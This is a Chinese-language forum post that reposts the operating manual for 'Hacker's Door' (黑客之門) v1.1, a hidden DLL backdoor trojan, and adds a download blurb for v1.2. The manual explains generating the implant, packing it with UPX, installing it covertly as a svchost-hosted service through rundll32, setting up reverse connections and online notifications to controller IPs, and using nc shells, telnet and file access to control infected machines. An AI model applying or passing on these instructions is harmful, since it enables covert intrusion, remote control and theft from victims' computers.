蔡逸竹

簡介

    黑客之門採用的目前一些先進的後門技術，它只有一個dll文件，通過感染系統文件啟動自身，被感染的系統文件大小和日期都不會改變；同時採用線程插入技術，本身沒有進程；它本身不開端口，而是重用系統進程開的任意一個端口，如80，135，139，445等，因此它的隱藏性是非常好的。

1.1版相對1.0版的改變：
1、全面改變客戶端，使得它使用起來方便多了。
2、增加反向連接功能。
3、增加上線通知功能。
4、內部版增加了使用svchost.exe啟動後門的方式。

一、使用環境

服務器端：Windows 2000及以上操作系統，服務器端默認文件名為hkdoordll.dll
客戶端：Windows 2000及以上操作系統，客戶端默認文件名為explore.exe。

二、使用步驟

1、運行客戶端explore.exe文件，使用菜單「高級功能－>生成服務器端」來生成服務器文件，默認文件名為hkdoordll.dll。
如圖:


2、使用菜單「設置－>服務器端文件」來設置服務器文件的一些選項
如圖:


彈出的設置窗口如下圖：


    其中的「連接密碼」項的作用十分重要，下面用客戶端對中木馬機器的操作成功的前提是連接密碼必須正確，只有你改了密碼，你種的木馬才不會給別人利用！
   「服務器端」就是你要配置的後門服務器端文件，你可以用'瀏覽'按鈕來選擇。
   「反向連接URL」就是服務器端反向連接配置文件放的地方，服務器端要根據這個文件裡的配置信息來實現反向連接和上線通知功能，你必須把配置好的反向連接配置文件放在URL指定的地方。

下面是反向連接配置文件的內容及其說明：
##################################
#Global setting
ClientIp=10.144.81.253
InterVal=60
#Connect back setting
IsWantConnectBack=1
ConnectBackPort=110
#Notify setting
IsWantNotify=1
NotifyModth=1
NotifyPort=500
IcmpType=8
IcmpCode=0
#Connect back server
Server=202.117.92.3
Server=202.35.46.1
#################################
上面就是反向連接配置文件的內容，其中以'#'開頭的行是註釋行，'ClientIp'是客戶端的ip地址，服務器端根據這個地址就可以找到客戶端了；'InterVal'是發上線通知報文的時間間隔，單位是秒；'IsWantConnectBack' 是表示是否需要反向連接，1表示需要，0表示不需要；'ConnectBackPort'是反向連接時客戶端開的等待服務器端連接的端口；'IsWantNotify'表示是否需要上線通知，1表示需要，0表示不需要；'NotifyModth'是上線通知的方法，0表示用icmp報文，1表示用udp報文；'NotifyPort'是客戶端開的等待上線通知報文的udp 端口，你可以用netstat -an命令來找客戶端開的udp端口；'IcmpType'是icmp報文類型，'IcmpCode'是icmp 報文的子類型，IcmpType=8，IcmpCode=0就表示ping(icmp echo)報文,而IcmpType=0，IcmpCode=0就表示 ping 應答(icmp echo reply)報文；'Server'表示需要反向連接的服務器端ip地址，只有ip在這個列表中的服務器端才會向客戶端反向連接。
注意：
   如果你的機器上裝有防火牆，你必須關掉它或者修改它的規則，使得上線通知報文和反向連接報文不會被防火牆擋住。

3、推薦使用upx等一些exe壓縮軟件都服務器端進行壓縮
注意一定要選中「強制壓縮」選項，否則有可能不能壓縮。
如圖:


4、在你要控制的機器上安裝服務器端。
具體方法請參考1.0版使用說明及動畫教程的安裝部分，如下：
黑客之門1.0（hacker's door）使用說明
黑客之門1.0（hacker's door） 動畫教程

下面說一下內部版加的安裝方式：
   在命令行下運行『rundll32 hkdoordll,DllRegisterServer 服務名 2 0』就可以了，其中『服務名』必須合法，如運行『rundll32 hkdoordll,DllRegisterServer Iprip 2 0』，就創建用svchost.exe來啟動的Iprip服務來啟動黑客之門，如果你不知道合法的服務名，可以先隨便給一個，然後到日誌裡去看合法的服務名列表。卸載用 『rundll32 hkdoordll,DllUnRegisterServer 密碼 服務名 2 0』，如rundll32 hkdoordll,DllUnRegisterServer yyt_hac Iprip 2 0』，密碼和服務名必須正確。

5、把那台機器添加到客戶端的中木馬的機器組中
為了對中木馬的機器進行操作，你必須先把那台機器添加到客戶端左邊樹型視圖任意一個計算機組中，如下圖：


6、設置客戶端
6.1設置連接選項，選擇菜單「設置－>連接選項」，彈出對話框如下圖：


6.1.1 在彈出窗口『連接服務器端的方式』選項中，有六個選項：NC連接、命令行客戶端、圖形查看、圖形控制、文件傳輸和反向連接，本版本只支持NC連接和反向連接。
   『NC連接』就是用nc.exe這個工具來連接黑客之門服務器端，它包含正向連接和反向連接，正向連接就是1.0版的連接方式，1.1版加了反向連接，它是指客戶端用nc.exe開端口來等待服務器端的連接，這種連接方式對於內網和動態ip的機器很有效，結合上線通知功能後效果更好。由於一般防火牆不會堵塞機器向外的連接請求，這種方式的成功機會比較大，不過只有有外部ip的用戶才可以使用這種方式。

注意：
1、用反向連接時，運行客戶端機器的反向連接端口不能被佔用，比如反向連接的端口，是80(這個端口是由反向連接配置裡的ConnectBackPort決定的)，則web服務器一定要關掉，不然中木馬的機器就會連到web服務器上而不是黑客之門客戶端！！！
2、用逆向連接連不上時，彈出的命令行端口不會自動關閉，請用Ctrl＋C關閉窗口。
3、運行「連接到黑客之門」菜單項彈出命令行窗口後，輸入『NCLOGIN 連接密碼』登錄到目標機器。正向連接時如果不能輸入則換連接端口，反向連接要等一段時間才能輸入。

6.1.2 建立文件傳輸連接的方式有兩種，如下：

通過黑客之門服務器建立連接－－這種方式用於安裝了黑客之門的機器，通過那台機器上的黑客之門服務器端來建立連接。
通過指定用戶名和密碼建立連接－－這種方式用於你知道有管理員權限的用戶名和密碼的機器。
本版本只支持『通過指定用戶名和密碼建立連接』的方式。

6.1.3 其它設置中的「連接端口」是用來決定正向連接時客戶端向服務器端連接的端口，要選一個服務器端的機器開的並且允許連接的端口，否則連接不到黑客之門服務器端；「連接密碼」一定要和剛才設置服務器文件時的連接密碼一樣，否則所有對中木馬機器的操作不會成功！

6.2 設置在線探測方式，選擇菜單「設置－>在線探測方式」，彈出對話框如下圖：


第一種方式就是通過連接所選擇計算機的tcp端口來判別機器是否在線著
第二種方式就是通過連接黑暗天使服務器端來判別機器是否在線
注意：用第一種方式探測到機器在線只能說明那台機器連在網上，而用第二種方式探測到機器在線，就是說明那台機器安裝了黑客之門服務器端，並且能連上，因此用這種方式時連接選項中的連接端口和連接密碼必須設置好。

6.3 設置反向連接和上線通知功能，選擇菜單「設置－>反向連接選項」，彈出對話框如下圖：


『網絡監聽ip』就是接收上線通知報文的ip，一般要設置為外網的ip，需要管理員權限，這個ip一定要設置正確否則上線通知功能 不能使用。
『反向連接URL』就是放反向連接配置文件的URL，也要和配置服務器端時的反向連接URL一致。
設置成功後，如果上線的計算機沒有添加到『遠程計算機』組中，則會自動加入，否則機器的圖標會變亮，同時將鼠標放到那台機器上時會出現服務器端的基本信息，如下圖：


7、使用客戶端對那台機器進行各種操作
選中那台機器，按右鍵彈出菜單，如下圖：


下面說明彈出菜單各項的作用
7.1 連接到黑客之門－－該項的作用就是根據連接選項中的「連接服務器端的方式」來和所選擇的機器建立連接，目前只支持用nc連接的方式,它會彈出一個命令行端口讓你輸入『NCLOGIN 連接密碼』登錄到黑客之門服務器端。
如下圖：


7.2 連接到telnet服務器－－該項的作用就是在中木馬的機器上打開telnet服務，但不添加用戶名和密碼，你必要用建立連接時的用戶名和密碼登錄，下圖為單擊該菜單項彈出的登錄，使用這個功能的前提是你必須用用戶名和密碼和目標機器建立了文件傳輸連接。窗口：


由於這種連接方式比較容易被發現，建議只在升級黑客之門或不能連接到黑客之門服務器端時使用。
7.3 停止telnet服務器－－該項的作用是停止目標機器上的telnet服務。前提和上一個功能一樣。
7.4 在線探測－－該項作用就是根據所設的在線探測方式來探測機器是否在線
7.5 建立文件傳輸連接－－該項的作用就是和遠程的機器建立文件傳輸連接，使你能夠象本地機器一樣瀏覽、操作遠程機器的文件。如下圖：


7.6 斷開文件傳輸連接－－該項的作用就是斷開上一項建立的文件傳輸連接。
7.7 高級菜單中在線探測全部就是探測所有的機器是否在線



hacker's door（黑客之門） Ver 1.2
軟件大小：206 KB
軟件語言：簡體中文
軟件類別：國產軟件 / 免費軟件 / 黑客程序
運行環境：Windows系列
軟件簡介：這是一款遠程控制軟件，採用了目前一些先進的後門技術，它只有一個dll文件，通過感染系統文件啟動自身，被感染的系統文件大小和日期都不會改變；同時採用線程插入技術，本身沒有進程；它本身不開端口，而是重用系統進程開的任意一個端口，如80、135、139、445等，因此它的隱藏性是非常好的。1.2版相對1.1版的改變：1、由於反向連接還不成熟，而且會影響隱蔽性，暫時去掉；2、增加一種使用命令行客戶端的連接方式，在這種方式中可以傳輸文件，在這種方式的命令行窗口中可以使用一些不即時退出的程序，如ftp，也可以登錄到其它的命令行式的後門中，如黑客之門；3、增加了一些有用的命令；4、增加了隱蔽性和穩定性，改了一些bug...


下載「黑客之門-hacker's door v1.2」
訪客無法瀏覽此圖片或連結，請先 註冊 或 登入會員 。
訪客無法瀏覽此圖片或連結，請先 註冊 或 登入會員 。

[ 本帖最後由 蔡逸竹 於 2006-9-7 21:34 編輯 ]